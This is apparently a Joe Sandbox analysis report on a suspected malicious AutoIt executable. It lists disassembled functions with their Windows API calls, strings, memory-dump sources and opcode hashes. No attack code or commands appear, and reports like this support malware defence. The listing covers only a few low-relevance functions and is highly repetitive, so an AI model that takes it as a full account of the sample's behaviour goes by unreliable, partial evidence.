                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: MessageSend_mallocwsprintf
                                                                                                                                                                                                                                                            • String ID: %d/%02d/%02d
                                                                                                                                                                                                                                                            • API String ID: 1262938277-328681919
                                                                                                                                                                                                                                                            • Opcode ID: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                                                                                                                                                                                                                                                            • Instruction ID: 953f6dd97ce98099cbba652085d0304866be84a46252058ffc4865c1a62d2123
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9DF0823274022866D7109BD9AD42FBEB3A8DB49762F00416BFE08E9180E6694854C3B9
                                                                                                                                                                                                                                                            Function 00442651 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22networkCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • InternetCloseHandle.WININET(?), ref: 00442663
                                                                                                                                                                                                                                                            • InternetCloseHandle.WININET ref: 00442668
                                                                                                                                                                                                                                                              • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CloseHandleInternet$ObjectSingleWait
                                                                                                                                                                                                                                                            • String ID: aeB
                                                                                                                                                                                                                                                            • API String ID: 857135153-906807131
                                                                                                                                                                                                                                                            • Opcode ID: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                                                                                                                                                                                                                            • Instruction ID: 0fa74210230a71b56b5a48e3a0e63043fcf8dca502afcbd281d0c2380f7acdeb
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 46E0E67650071467D310AF9ADC00B4BF7DC9F95724F11482FEA4497650C6B5B4408BA4
                                                                                                                                                                                                                                                            Function 00433244 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _wcsncpy
                                                                                                                                                                                                                                                            • String ID: ^B$C:\Users\user\Desktop\LKxcbzlwkz.exe
                                                                                                                                                                                                                                                            • API String ID: 1735881322-1437754140
                                                                                                                                                                                                                                                            • Opcode ID: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
                                                                                                                                                                                                                                                            • Instruction ID: 95fca152a805ab331260cabc3645652019b64b11bc5d0d7a1f408bc65d2df1f2
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ADE0C23360051A7B9710DE4AD841DBBF37DEEC4A20B08802AF90883200E2B1BD1A43E4
                                                                                                                                                                                                                                                            Function 00441BE8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441BFE
                                                                                                                                                                                                                                                            • PostMessageW.USER32(00000000), ref: 00441C05
                                                                                                                                                                                                                                                              • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                                                                                            • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                                            • API String ID: 529655941-2988720461
                                                                                                                                                                                                                                                            • Opcode ID: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                                                                                                                                                                                                                            • Instruction ID: aba4e04af0122a293c2d26b46e7c49f9db856b5fc79b6d6ac13cebee95b63d36
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EFD0A772BC13013BFA6077745D0FF8B66145B14711F000C3A7B42E61C1D4F8E4018758
                                                                                                                                                                                                                                                            Function 00441C20 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441C2A
                                                                                                                                                                                                                                                            • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00441C3D
                                                                                                                                                                                                                                                              • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                                                                                            • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                                            • API String ID: 529655941-2988720461
                                                                                                                                                                                                                                                            • Opcode ID: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                                                                                                                                                                                                                            • Instruction ID: e91d5bd0f3095d95abf168919443ed1e5ef8457e9bc9ee6dadeb2d3358a759b2
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 61D0A772B843017BFA6077745D0FF8B66145B14711F000C3A7B46A61C1D4F8D4018758
                                                                                                                                                                                                                                                            Function 004370C3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
                                                                                                                                                                                                                                                              • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Message_doexit
                                                                                                                                                                                                                                                            • String ID: AutoIt$Error allocating memory.
                                                                                                                                                                                                                                                            • API String ID: 1993061046-4017498283
                                                                                                                                                                                                                                                            • Opcode ID: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                                                                                                                                                                                                                            • Instruction ID: aa36ec6b1cc278624b5c670a1a0522bf80bf1016c56dd6686bcadf549e8ac499
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F1B092323C030627E50437910D0BF9D26003B64F02F220C067324280D204C90090131D